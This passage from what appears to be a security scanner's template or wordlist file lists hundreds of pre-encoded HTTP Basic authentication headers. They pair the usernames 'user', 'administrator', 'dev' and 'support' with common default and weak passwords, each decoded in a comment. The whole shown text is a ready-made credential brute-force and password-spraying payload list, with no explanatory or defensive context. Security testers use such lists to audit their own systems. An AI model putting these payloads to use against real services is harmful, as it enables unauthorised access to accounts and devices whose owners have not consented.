dXNlcjptYXN0ZXI=" #user:master 1261 | - "BASIC dXNlcjpvcmFjbGU=" #user:oracle 1262 | - "BASIC dXNlcjpwQCQkdzByZA==" #user:p@$$w0rd 1263 | - "BASIC dXNlcjpQQHNzdzByZA==" #user:P@ssw0rd 1264 | - "BASIC dXNlcjpwQHNzdzByZA==" #user:p@ssw0rd 1265 | - "BASIC dXNlcjpQQHNzdzByZCE=" #user:P@ssw0rd! 1266 | - "BASIC dXNlcjpwQHNzd29yZA==" #user:p@ssword 1267 | - "BASIC dXNlcjpwYTU1dzByZA==" #user:pa55w0rd 1268 | - "BASIC dXNlcjpwYXNz" #user:pass 1269 | - "BASIC dXNlcjpwYXNzdzByZA==" #user:passw0rd 1270 | - "BASIC dXNlcjpwYXNzd29yZA==" #user:password 1271 | - "BASIC dXNlcjpwYXNzd29yZDEyMw==" #user:password123 1272 | - "BASIC dXNlcjpxMXcyZTM=" #user:q1w2e3 1273 | - "BASIC dXNlcjpxMXcyZTNyNA==" #user:q1w2e3r4 1274 | - "BASIC dXNlcjpxMXcyZTNyNHQ1" #user:q1w2e3r4t5 1275 | - "BASIC dXNlcjpxYXp3c3hlZGM=" #user:qazwsxedc 1276 | - "BASIC dXNlcjpxd2UxMjM=" #user:qwe123 1277 | - "BASIC dXNlcjpxd2VyMTIzNA==" #user:qwer1234 1278 | - "BASIC dXNlcjpxd2VydHk=" #user:qwerty 1279 | - "BASIC dXNlcjpxd2VydHkxMjM=" #user:qwerty123 1280 | - "BASIC dXNlcjpyZWRoYXQ=" #user:redhat 1281 | - "BASIC dXNlcjpyb290" #user:root 1282 | - "BASIC dXNlcjpyb290MTIz" #user:root123 1283 | - "BASIC dXNlcjpyb290MTIzNA==" #user:root1234 1284 | - "BASIC dXNlcjpyb290QDEyMw==" #user:root@123 1285 | - "BASIC dXNlcjpyb290cm9vdA==" #user:rootroot 1286 | - "BASIC dXNlcjpzZXJ2ZXI=" #user:server 1287 | - "BASIC dXNlcjpzdXBlcnVzZXI=" #user:superuser 1288 | - "BASIC dXNlcjpzeXN0ZW0=" #user:system 1289 | - "BASIC dXNlcjpUZXN0" #user:Test 1290 | - "BASIC dXNlcjp0ZXN0" #user:test 1291 | - "BASIC dXNlcjp0ZXN0MTIz" #user:test123 1292 | - "BASIC dXNlcjp0b29y" #user:toor 1293 | - "BASIC dXNlcjp1Ym50" #user:ubnt 1294 | - "BASIC dXNlcjp1YnVudHU=" #user:ubuntu 1295 | - "BASIC dXNlcjpVc2Vy" #user:User 1296 | - "BASIC dXNlcjp1c2Vy" #user:user 1297 | - "BASIC dXNlcjp2bXdhcmU=" #user:vmware 1298 | - "BASIC dXNlcjp3ZWxjb21l" #user:welcome 1299 | - "BASIC dXNlcjp3dWJhbw==" #user:wubao 1300 | - "BASIC dXNlcjp6YXExMndzeA==" #user:zaq12wsx 1301 | 
- "BASIC dXNlcjp6eGN2Ym4=" #user:zxcvbn 1302 | - "BASIC dXNlcjp6eGN2Ym5t" #user:zxcvbnm 1303 | - "BASIC dXNlcjpjaGFuZ2VpdA==" #user:changeit 1304 | - "BASIC YWRtaW5pc3RyYXRvcjo=" #administrator: 1305 | - "BASIC YWRtaW5pc3RyYXRvcjohUUFaMndzeA==" #administrator:!QAZ2wsx 1306 | - "BASIC YWRtaW5pc3RyYXRvcjohcWF6QHdzeA==" #administrator:!qaz@wsx 1307 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAw" #administrator:0000 1308 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDA=" #administrator:000000 1309 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDAw" #administrator:0000000 1310 | - "BASIC YWRtaW5pc3RyYXRvcjowMDAwMDAwMA==" #administrator:00000000 1311 | - "BASIC YWRtaW5pc3RyYXRvcjowOTg3NjU0MzIx" #administrator:0987654321 1312 | - "BASIC YWRtaW5pc3RyYXRvcjow" #administrator:0 1313 | - "BASIC YWRtaW5pc3RyYXRvcjox" #administrator:1 1314 | - "BASIC YWRtaW5pc3RyYXRvcjoy" #administrator:2 1315 | - "BASIC YWRtaW5pc3RyYXRvcjoz" #administrator:3 1316 | - "BASIC YWRtaW5pc3RyYXRvcjo0" #administrator:4 1317 | - "BASIC YWRtaW5pc3RyYXRvcjo1" #administrator:5 1318 | - "BASIC YWRtaW5pc3RyYXRvcjo2" #administrator:6 1319 | - "BASIC YWRtaW5pc3RyYXRvcjo3" #administrator:7 1320 | - "BASIC YWRtaW5pc3RyYXRvcjo4" #administrator:8 1321 | - "BASIC YWRtaW5pc3RyYXRvcjo5" #administrator:9 1322 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTEx" #administrator:1111 1323 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMQ==" #administrator:11111 1324 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTE=" #administrator:111111 1325 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTEx" #administrator:1111111 1326 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTExMTExMQ==" #administrator:11111111 1327 | - "BASIC YWRtaW5pc3RyYXRvcjoxMTIyMzM=" #administrator:112233 1328 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjEyMTI=" #administrator:121212 1329 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM=" #administrator:123 1330 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjMxMjM=" #administrator:123123 1331 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjMzMjE=" #administrator:123321 1332 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0" #administrator:1234 1333 | - "BASIC 
YWRtaW5pc3RyYXRvcjoxMjM0NQ==" #administrator:12345 1334 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY=" #administrator:123456 1335 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3" #administrator:1234567 1336 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3OA==" #administrator:12345678 1337 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3ODk=" #administrator:123456789 1338 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0NTY3ODkw" #administrator:1234567890 1339 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0YWJjZA==" #administrator:1234abcd 1340 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjM0cXdlcg==" #administrator:1234qwer 1341 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNhYmM=" #administrator:123abc 1342 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNhc2Q=" #administrator:123asd 1343 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNxd2U=" #administrator:123qwe 1344 | - "BASIC YWRtaW5pc3RyYXRvcjoxMjNxd2Vhc2Q=" #administrator:123qweasd 1345 | - "BASIC YWRtaW5pc3RyYXRvcjoxMnF3YXN6eA==" #administrator:12qwaszx 1346 | - "BASIC YWRtaW5pc3RyYXRvcjoxZTJlM2U=" #administrator:1e2e3e 1347 | - "BASIC YWRtaW5pc3RyYXRvcjoxZTJlM2U0ZQ==" #administrator:1e2e3e4e 1348 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJxM3E=" #administrator:1q2q3q 1349 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJxM3E0cQ==" #administrator:1q2q3q4q 1350 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U=" #administrator:1q2w3e 1351 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U0cg==" #administrator:1q2w3e4r 1352 | - "BASIC YWRtaW5pc3RyYXRvcjoxcTJ3M2U0cjV0" #administrator:1q2w3e4r5t 1353 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6MndzeA==" #administrator:1qaz2wsx 1354 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6MndzeDNlZGM=" #administrator:1qaz2wsx3edc 1355 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6eHN3Mg==" #administrator:1qazxsw2 1356 | - "BASIC YWRtaW5pc3RyYXRvcjoxcWF6WFNXQA==" #administrator:1qazXSW@ 1357 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJxIVdAUQ==" #administrator:1w2q!W@Q 1358 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJ3M3c=" #administrator:1w2w3w 1359 | - "BASIC YWRtaW5pc3RyYXRvcjoxdzJ3M3c0dw==" #administrator:1w2w3w4w 1360 | - "BASIC YWRtaW5pc3RyYXRvcjo1NDMyMQ==" 
#administrator:54321 1361 | - "BASIC YWRtaW5pc3RyYXRvcjo2NTQzMjE=" #administrator:654321 1362 | - "BASIC YWRtaW5pc3RyYXRvcjo4ODg4ODg=" #administrator:888888 1363 | - "BASIC YWRtaW5pc3RyYXRvcjph" #administrator:a 1364 | - "BASIC YWRtaW5pc3RyYXRvcjphYmMxMjM=" #administrator:abc123 1365 | - "BASIC YWRtaW5pc3RyYXRvcjphYmNkMTIzNA==" #administrator:abcd1234 1366 | - "BASIC YWRtaW5pc3RyYXRvcjpBZG1pbg==" #administrator:Admin 1367 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbg==" #administrator:admin 1368 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbiFA" #administrator:admin!@ 1369 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjE=" #administrator:admin1 1370 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEy" #administrator:admin12 1371 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEyMw==" #administrator:admin123 1372 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbjEyMzQ1Ng==" #administrator:admin123456 1373 | - "BASIC YWRtaW5pc3RyYXRvcjphZG1pbmlzdHJhdG9y" #administrator:administrator 1374 | - "BASIC YWRtaW5pc3RyYXRvcjphbHBpbmU=" #administrator:alpine 1375 | - "BASIC YWRtaW5pc3RyYXRvcjphc2QxMjM=" #administrator:asd123 1376 | - "BASIC YWRtaW5pc3RyYXRvcjphc2Rm" #administrator:asdf 1377 | - "BASIC YWRtaW5pc3RyYXRvcjphc2RmMTIzNA==" #administrator:asdf1234 1378 | - "BASIC YWRtaW5pc3RyYXRvcjphc2RmZ2g=" #administrator:asdfgh 1379 | - "BASIC YWRtaW5pc3RyYXRvcjpjZW50b3M=" #administrator:centos 1380 | - "BASIC YWRtaW5pc3RyYXRvcjpjaGFuZ2VtZQ==" #administrator:changeme 1381 | - "BASIC YWRtaW5pc3RyYXRvcjpjaXNjbw==" #administrator:cisco 1382 | - "BASIC YWRtaW5pc3RyYXRvcjpjaXNjbzEyMw==" #administrator:cisco123 1383 | - "BASIC YWRtaW5pc3RyYXRvcjpkZWZhdWx0" #administrator:default 1384 | - "BASIC YWRtaW5pc3RyYXRvcjppZGMhQA==" #administrator:idc!@ 1385 | - "BASIC YWRtaW5pc3RyYXRvcjpqaWFtaW1h" #administrator:jiamima 1386 | - "BASIC YWRtaW5pc3RyYXRvcjpsZXRtZWlu" #administrator:letmein 1387 | - "BASIC YWRtaW5pc3RyYXRvcjpsaW51eA==" #administrator:linux 1388 | - "BASIC YWRtaW5pc3RyYXRvcjptYW5hZ2Vy" #administrator:manager 1389 | - "BASIC 
YWRtaW5pc3RyYXRvcjptYXN0ZXI=" #administrator:master 1390 | - "BASIC YWRtaW5pc3RyYXRvcjpvcmFjbGU=" #administrator:oracle 1391 | - "BASIC YWRtaW5pc3RyYXRvcjpwQCQkdzByZA==" #administrator:p@$$w0rd 1392 | - "BASIC YWRtaW5pc3RyYXRvcjpQQHNzdzByZA==" #administrator:P@ssw0rd 1393 | - "BASIC YWRtaW5pc3RyYXRvcjpwQHNzdzByZA==" #administrator:p@ssw0rd 1394 | - "BASIC YWRtaW5pc3RyYXRvcjpQQHNzdzByZCE=" #administrator:P@ssw0rd! 1395 | - "BASIC YWRtaW5pc3RyYXRvcjpwQHNzd29yZA==" #administrator:p@ssword 1396 | - "BASIC YWRtaW5pc3RyYXRvcjpwYTU1dzByZA==" #administrator:pa55w0rd 1397 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNz" #administrator:pass 1398 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzdzByZA==" #administrator:passw0rd 1399 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzd29yZA==" #administrator:password 1400 | - "BASIC YWRtaW5pc3RyYXRvcjpwYXNzd29yZDEyMw==" #administrator:password123 1401 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTM=" #administrator:q1w2e3 1402 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTNyNA==" #administrator:q1w2e3r4 1403 | - "BASIC YWRtaW5pc3RyYXRvcjpxMXcyZTNyNHQ1" #administrator:q1w2e3r4t5 1404 | - "BASIC YWRtaW5pc3RyYXRvcjpxYXp3c3hlZGM=" #administrator:qazwsxedc 1405 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2UxMjM=" #administrator:qwe123 1406 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VyMTIzNA==" #administrator:qwer1234 1407 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VydHk=" #administrator:qwerty 1408 | - "BASIC YWRtaW5pc3RyYXRvcjpxd2VydHkxMjM=" #administrator:qwerty123 1409 | - "BASIC YWRtaW5pc3RyYXRvcjpyZWRoYXQ=" #administrator:redhat 1410 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290" #administrator:root 1411 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290MTIz" #administrator:root123 1412 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290MTIzNA==" #administrator:root1234 1413 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290QDEyMw==" #administrator:root@123 1414 | - "BASIC YWRtaW5pc3RyYXRvcjpyb290cm9vdA==" #administrator:rootroot 1415 | - "BASIC YWRtaW5pc3RyYXRvcjpzZXJ2ZXI=" #administrator:server 1416 | - "BASIC YWRtaW5pc3RyYXRvcjpzdXBlcnVzZXI=" #administrator:superuser 
1417 | - "BASIC YWRtaW5pc3RyYXRvcjpzeXN0ZW0=" #administrator:system 1418 | - "BASIC YWRtaW5pc3RyYXRvcjpUZXN0" #administrator:Test 1419 | - "BASIC YWRtaW5pc3RyYXRvcjp0ZXN0" #administrator:test 1420 | - "BASIC YWRtaW5pc3RyYXRvcjp0ZXN0MTIz" #administrator:test123 1421 | - "BASIC YWRtaW5pc3RyYXRvcjp0b29y" #administrator:toor 1422 | - "BASIC YWRtaW5pc3RyYXRvcjp1Ym50" #administrator:ubnt 1423 | - "BASIC YWRtaW5pc3RyYXRvcjp1YnVudHU=" #administrator:ubuntu 1424 | - "BASIC YWRtaW5pc3RyYXRvcjpVc2Vy" #administrator:User 1425 | - "BASIC YWRtaW5pc3RyYXRvcjp1c2Vy" #administrator:user 1426 | - "BASIC YWRtaW5pc3RyYXRvcjp2bXdhcmU=" #administrator:vmware 1427 | - "BASIC YWRtaW5pc3RyYXRvcjp3ZWxjb21l" #administrator:welcome 1428 | - "BASIC YWRtaW5pc3RyYXRvcjp3dWJhbw==" #administrator:wubao 1429 | - "BASIC YWRtaW5pc3RyYXRvcjp6YXExMndzeA==" #administrator:zaq12wsx 1430 | - "BASIC YWRtaW5pc3RyYXRvcjp6eGN2Ym4=" #administrator:zxcvbn 1431 | - "BASIC YWRtaW5pc3RyYXRvcjp6eGN2Ym5t" #administrator:zxcvbnm 1432 | - "BASIC YWRtaW5pc3RyYXRvcjpjaGFuZ2VpdA==" #administrator:changeit 1433 | - "BASIC ZGV2Og==" #dev: 1434 | - "BASIC ZGV2OiFRQVoyd3N4" #dev:!QAZ2wsx 1435 | - "BASIC ZGV2OiFxYXpAd3N4" #dev:!qaz@wsx 1436 | - "BASIC ZGV2OjAwMDA=" #dev:0000 1437 | - "BASIC ZGV2OjAwMDAwMA==" #dev:000000 1438 | - "BASIC ZGV2OjAwMDAwMDA=" #dev:0000000 1439 | - "BASIC ZGV2OjAwMDAwMDAw" #dev:00000000 1440 | - "BASIC ZGV2OjA5ODc2NTQzMjE=" #dev:0987654321 1441 | - "BASIC ZGV2OjA=" #dev:0 1442 | - "BASIC ZGV2OjE=" #dev:1 1443 | - "BASIC ZGV2OjI=" #dev:2 1444 | - "BASIC ZGV2OjM=" #dev:3 1445 | - "BASIC ZGV2OjQ=" #dev:4 1446 | - "BASIC ZGV2OjU=" #dev:5 1447 | - "BASIC ZGV2OjY=" #dev:6 1448 | - "BASIC ZGV2Ojc=" #dev:7 1449 | - "BASIC ZGV2Ojg=" #dev:8 1450 | - "BASIC ZGV2Ojk=" #dev:9 1451 | - "BASIC ZGV2OjExMTE=" #dev:1111 1452 | - "BASIC ZGV2OjExMTEx" #dev:11111 1453 | - "BASIC ZGV2OjExMTExMQ==" #dev:111111 1454 | - "BASIC ZGV2OjExMTExMTE=" #dev:1111111 1455 | - "BASIC ZGV2OjExMTExMTEx" #dev:11111111 1456 | - "BASIC 
ZGV2OjExMjIzMw==" #dev:112233 1457 | - "BASIC ZGV2OjEyMTIxMg==" #dev:121212 1458 | - "BASIC ZGV2OjEyMw==" #dev:123 1459 | - "BASIC ZGV2OjEyMzEyMw==" #dev:123123 1460 | - "BASIC ZGV2OjEyMzMyMQ==" #dev:123321 1461 | - "BASIC ZGV2OjEyMzQ=" #dev:1234 1462 | - "BASIC ZGV2OjEyMzQ1" #dev:12345 1463 | - "BASIC ZGV2OjEyMzQ1Ng==" #dev:123456 1464 | - "BASIC ZGV2OjEyMzQ1Njc=" #dev:1234567 1465 | - "BASIC ZGV2OjEyMzQ1Njc4" #dev:12345678 1466 | - "BASIC ZGV2OjEyMzQ1Njc4OQ==" #dev:123456789 1467 | - "BASIC ZGV2OjEyMzQ1Njc4OTA=" #dev:1234567890 1468 | - "BASIC ZGV2OjEyMzRhYmNk" #dev:1234abcd 1469 | - "BASIC ZGV2OjEyMzRxd2Vy" #dev:1234qwer 1470 | - "BASIC ZGV2OjEyM2FiYw==" #dev:123abc 1471 | - "BASIC ZGV2OjEyM2FzZA==" #dev:123asd 1472 | - "BASIC ZGV2OjEyM3F3ZQ==" #dev:123qwe 1473 | - "BASIC ZGV2OjEyM3F3ZWFzZA==" #dev:123qweasd 1474 | - "BASIC ZGV2OjEycXdhc3p4" #dev:12qwaszx 1475 | - "BASIC ZGV2OjFlMmUzZQ==" #dev:1e2e3e 1476 | - "BASIC ZGV2OjFlMmUzZTRl" #dev:1e2e3e4e 1477 | - "BASIC ZGV2OjFxMnEzcQ==" #dev:1q2q3q 1478 | - "BASIC ZGV2OjFxMnEzcTRx" #dev:1q2q3q4q 1479 | - "BASIC ZGV2OjFxMnczZQ==" #dev:1q2w3e 1480 | - "BASIC ZGV2OjFxMnczZTRy" #dev:1q2w3e4r 1481 | - "BASIC ZGV2OjFxMnczZTRyNXQ=" #dev:1q2w3e4r5t 1482 | - "BASIC ZGV2OjFxYXoyd3N4" #dev:1qaz2wsx 1483 | - "BASIC ZGV2OjFxYXoyd3N4M2VkYw==" #dev:1qaz2wsx3edc 1484 | - "BASIC ZGV2OjFxYXp4c3cy" #dev:1qazxsw2 1485 | - "BASIC ZGV2OjFxYXpYU1dA" #dev:1qazXSW@ 1486 | - "BASIC ZGV2OjF3MnEhV0BR" #dev:1w2q!W@Q 1487 | - "BASIC ZGV2OjF3Mnczdw==" #dev:1w2w3w 1488 | - "BASIC ZGV2OjF3MnczdzR3" #dev:1w2w3w4w 1489 | - "BASIC ZGV2OjU0MzIx" #dev:54321 1490 | - "BASIC ZGV2OjY1NDMyMQ==" #dev:654321 1491 | - "BASIC ZGV2Ojg4ODg4OA==" #dev:888888 1492 | - "BASIC ZGV2OmE=" #dev:a 1493 | - "BASIC ZGV2OmFiYzEyMw==" #dev:abc123 1494 | - "BASIC ZGV2OmFiY2QxMjM0" #dev:abcd1234 1495 | - "BASIC ZGV2OkFkbWlu" #dev:Admin 1496 | - "BASIC ZGV2OmFkbWlu" #dev:admin 1497 | - "BASIC ZGV2OmFkbWluIUA=" #dev:admin!@ 1498 | - "BASIC ZGV2OmFkbWluMQ==" #dev:admin1 1499 | - 
"BASIC ZGV2OmFkbWluMTI=" #dev:admin12 1500 | - "BASIC ZGV2OmFkbWluMTIz" #dev:admin123 1501 | - "BASIC ZGV2OmFkbWluMTIzNDU2" #dev:admin123456 1502 | - "BASIC ZGV2OmFkbWluaXN0cmF0b3I=" #dev:administrator 1503 | - "BASIC ZGV2OmFscGluZQ==" #dev:alpine 1504 | - "BASIC ZGV2OmFzZDEyMw==" #dev:asd123 1505 | - "BASIC ZGV2OmFzZGY=" #dev:asdf 1506 | - "BASIC ZGV2OmFzZGYxMjM0" #dev:asdf1234 1507 | - "BASIC ZGV2OmFzZGZnaA==" #dev:asdfgh 1508 | - "BASIC ZGV2OmNlbnRvcw==" #dev:centos 1509 | - "BASIC ZGV2OmNoYW5nZW1l" #dev:changeme 1510 | - "BASIC ZGV2OmNpc2Nv" #dev:cisco 1511 | - "BASIC ZGV2OmNpc2NvMTIz" #dev:cisco123 1512 | - "BASIC ZGV2OmRlZmF1bHQ=" #dev:default 1513 | - "BASIC ZGV2OmlkYyFA" #dev:idc!@ 1514 | - "BASIC ZGV2OmppYW1pbWE=" #dev:jiamima 1515 | - "BASIC ZGV2OmxldG1laW4=" #dev:letmein 1516 | - "BASIC ZGV2OmxpbnV4" #dev:linux 1517 | - "BASIC ZGV2Om1hbmFnZXI=" #dev:manager 1518 | - "BASIC ZGV2Om1hc3Rlcg==" #dev:master 1519 | - "BASIC ZGV2Om9yYWNsZQ==" #dev:oracle 1520 | - "BASIC ZGV2OnBAJCR3MHJk" #dev:p@$$w0rd 1521 | - "BASIC ZGV2OlBAc3N3MHJk" #dev:P@ssw0rd 1522 | - "BASIC ZGV2OnBAc3N3MHJk" #dev:p@ssw0rd 1523 | - "BASIC ZGV2OlBAc3N3MHJkIQ==" #dev:P@ssw0rd! 
1524 | - "BASIC ZGV2OnBAc3N3b3Jk" #dev:p@ssword 1525 | - "BASIC ZGV2OnBhNTV3MHJk" #dev:pa55w0rd 1526 | - "BASIC ZGV2OnBhc3M=" #dev:pass 1527 | - "BASIC ZGV2OnBhc3N3MHJk" #dev:passw0rd 1528 | - "BASIC ZGV2OnBhc3N3b3Jk" #dev:password 1529 | - "BASIC ZGV2OnBhc3N3b3JkMTIz" #dev:password123 1530 | - "BASIC ZGV2OnExdzJlMw==" #dev:q1w2e3 1531 | - "BASIC ZGV2OnExdzJlM3I0" #dev:q1w2e3r4 1532 | - "BASIC ZGV2OnExdzJlM3I0dDU=" #dev:q1w2e3r4t5 1533 | - "BASIC ZGV2OnFhendzeGVkYw==" #dev:qazwsxedc 1534 | - "BASIC ZGV2OnF3ZTEyMw==" #dev:qwe123 1535 | - "BASIC ZGV2OnF3ZXIxMjM0" #dev:qwer1234 1536 | - "BASIC ZGV2OnF3ZXJ0eQ==" #dev:qwerty 1537 | - "BASIC ZGV2OnF3ZXJ0eTEyMw==" #dev:qwerty123 1538 | - "BASIC ZGV2OnJlZGhhdA==" #dev:redhat 1539 | - "BASIC ZGV2OnJvb3Q=" #dev:root 1540 | - "BASIC ZGV2OnJvb3QxMjM=" #dev:root123 1541 | - "BASIC ZGV2OnJvb3QxMjM0" #dev:root1234 1542 | - "BASIC ZGV2OnJvb3RAMTIz" #dev:root@123 1543 | - "BASIC ZGV2OnJvb3Ryb290" #dev:rootroot 1544 | - "BASIC ZGV2OnNlcnZlcg==" #dev:server 1545 | - "BASIC ZGV2OnN1cGVydXNlcg==" #dev:superuser 1546 | - "BASIC ZGV2OnN5c3RlbQ==" #dev:system 1547 | - "BASIC ZGV2OlRlc3Q=" #dev:Test 1548 | - "BASIC ZGV2OnRlc3Q=" #dev:test 1549 | - "BASIC ZGV2OnRlc3QxMjM=" #dev:test123 1550 | - "BASIC ZGV2OnRvb3I=" #dev:toor 1551 | - "BASIC ZGV2OnVibnQ=" #dev:ubnt 1552 | - "BASIC ZGV2OnVidW50dQ==" #dev:ubuntu 1553 | - "BASIC ZGV2OlVzZXI=" #dev:User 1554 | - "BASIC ZGV2OnVzZXI=" #dev:user 1555 | - "BASIC ZGV2OnZtd2FyZQ==" #dev:vmware 1556 | - "BASIC ZGV2OndlbGNvbWU=" #dev:welcome 1557 | - "BASIC ZGV2Ond1YmFv" #dev:wubao 1558 | - "BASIC ZGV2OnphcTEyd3N4" #dev:zaq12wsx 1559 | - "BASIC ZGV2Onp4Y3Zibg==" #dev:zxcvbn 1560 | - "BASIC ZGV2Onp4Y3Zibm0=" #dev:zxcvbnm 1561 | - "BASIC ZGV2OmNoYW5nZWl0" #dev:changeit 1562 | - "BASIC c3VwcG9ydDo=" #support: 1563 | - "BASIC c3VwcG9ydDohUUFaMndzeA==" #support:!QAZ2wsx 1564 | - "BASIC c3VwcG9ydDohcWF6QHdzeA==" #support:!qaz@wsx 1565 | - "BASIC c3VwcG9ydDowMDAw" #support:0000 1566 | - "BASIC 
c3VwcG9ydDowMDAwMDA=" #support:000000 1567 | - "BASIC c3VwcG9ydDowMDAwMDAw" #support:0000000 1568 | - "BASIC c3VwcG9ydDowMDAwMDAwMA==" #support:00000000 1569 | - "BASIC c3VwcG9ydDowOTg3NjU0MzIx" #support:0987654321 1570 | - "BASIC c3VwcG9ydDow" #support:0 1571 | - "BASIC c3VwcG9ydDox" #support:1 1572 | - "BASIC c3VwcG9ydDoy" #support:2 1573 | - "BASIC c3VwcG9ydDoz" #support:3 1574 | - "BASIC c3VwcG9ydDo0" #support:4 1575 | - "BASIC c3VwcG9ydDo1" #support:5 1576 | - "BASIC c3VwcG9ydDo2" #support:6 1577 | - "BASIC c3VwcG9ydDo3" #support:7 1578 | - "BASIC c3VwcG9ydDo4" #support:8 1579 | - "BASIC c3VwcG9ydDo5" #support:9 1580 | - "BASIC c3VwcG9ydDoxMTEx" #support:1111 1581 | - "BASIC c3VwcG9ydDoxMTExMQ==" #support:11111 1582 | - "BASIC c3VwcG9ydDoxMTExMTE=" #support:111111 1583 | - "BASIC c3VwcG9ydDoxMTExMTEx" #support:1111111 1584 | - "BASIC c3VwcG9ydDoxMTExMTExMQ==" #support:11111111 1585 | - "BASIC c3VwcG9ydDoxMTIyMzM=" #support:112233 1586 | - "BASIC c3VwcG9ydDoxMjEyMTI=" #support:121212 1587 | - "BASIC c3VwcG9ydDoxMjM=" #support:123 1588 | - "BASIC c3VwcG9ydDoxMjMxMjM=" #support:123123 1589 | - "BASIC c3VwcG9ydDoxMjMzMjE=" #support:123321 1590 | - "BASIC c3VwcG9ydDoxMjM0" #support:1234 1591 | - "BASIC c3VwcG9ydDoxMjM0NQ==" #support:12345 1592 | - "BASIC c3VwcG9ydDoxMjM0NTY=" #support:123456 1593 | - "BASIC c3VwcG9ydDoxMjM0NTY3" #support:1234567 1594 | - "BASIC c3VwcG9ydDoxMjM0NTY3OA==" #support:12345678 1595 | - "BASIC c3VwcG9ydDoxMjM0NTY3ODk=" #support:123456789 1596 | - "BASIC c3VwcG9ydDoxMjM0NTY3ODkw" #support:1234567890 1597 | - "BASIC c3VwcG9ydDoxMjM0YWJjZA==" #support:1234abcd 1598 | - "BASIC c3VwcG9ydDoxMjM0cXdlcg==" #support:1234qwer 1599 | - "BASIC c3VwcG9ydDoxMjNhYmM=" #support:123abc 1600 | - "BASIC c3VwcG9ydDoxMjNhc2Q=" #support:123asd 1601 | - "BASIC c3VwcG9ydDoxMjNxd2U=" #support:123qwe 1602 | - "BASIC c3VwcG9ydDoxMjNxd2Vhc2Q=" #support:123qweasd 1603 | - "BASIC c3VwcG9ydDoxMnF3YXN6eA==" #support:12qwaszx 1604 | - "BASIC c3VwcG9ydDoxZTJlM2U=" 
#support:1e2e3e 1605 | - "BASIC c3VwcG9ydDoxZTJlM2U0ZQ==" #support:1e2e3e4e 1606 | - "BASIC c3VwcG9ydDoxcTJxM3E=" #support:1q2q3q 1607 | - "BASIC c3VwcG9ydDoxcTJxM3E0cQ==" #support:1q2q3q4q 1608 | - "BASIC c3VwcG9ydDoxcTJ3M2U=" #support:1q2w3e 1609 | - "BASIC c3VwcG9ydDoxcTJ3M2U0cg==" #support:1q2w3e4r 1610 | - "BASIC c3VwcG9ydDoxcTJ3M2U0cjV0" #support:1q2w3e4r5t 1611 | - "BASIC c3VwcG9ydDoxcWF6MndzeA==" #support:1qaz2wsx 1612 | - "BASIC c3VwcG9ydDoxcWF6MndzeDNlZGM=" #support:1qaz2wsx3edc 1613 | - "BASIC c3VwcG9ydDoxcWF6eHN3Mg==" #support:1qazxsw2 1614 | - "BASIC c3VwcG9ydDoxcWF6WFNXQA==" #support:1qazXSW@ 1615 | - "BASIC c3VwcG9ydDoxdzJxIVdAUQ==" #support:1w2q!W@Q 1616 | - "BASIC c3VwcG9ydDoxdzJ3M3c=" #support:1w2w3w 1617 | - "BASIC c3VwcG9ydDoxdzJ3M3c0dw==" #support:1w2w3w4w 1618 | - "BASIC c3VwcG9ydDo1NDMyMQ==" #support:54321 1619 | - "BASIC c3VwcG9ydDo2NTQzMjE=" #support:654321 1620 | - "BASIC c3VwcG9ydDo4ODg4ODg=" #support:888888 1621 | - "BASIC c3VwcG9ydDph" #support:a 1622 | - "BASIC c3VwcG9ydDphYmMxMjM=" #support:abc123 1623 | - "BASIC c3VwcG9ydDphYmNkMTIzNA==" #support:abcd1234 1624 | - "BASIC c3VwcG9ydDpBZG1pbg==" #support:Admin 1625 | - "BASIC c3VwcG9ydDphZG1pbg==" #support:admin 1626 | - "BASIC c3VwcG9ydDphZG1pbiFA" #support:admin!@ 1627 | - "BASIC c3VwcG9ydDphZG1pbjE=" #support:admin1 1628 | - "BASIC 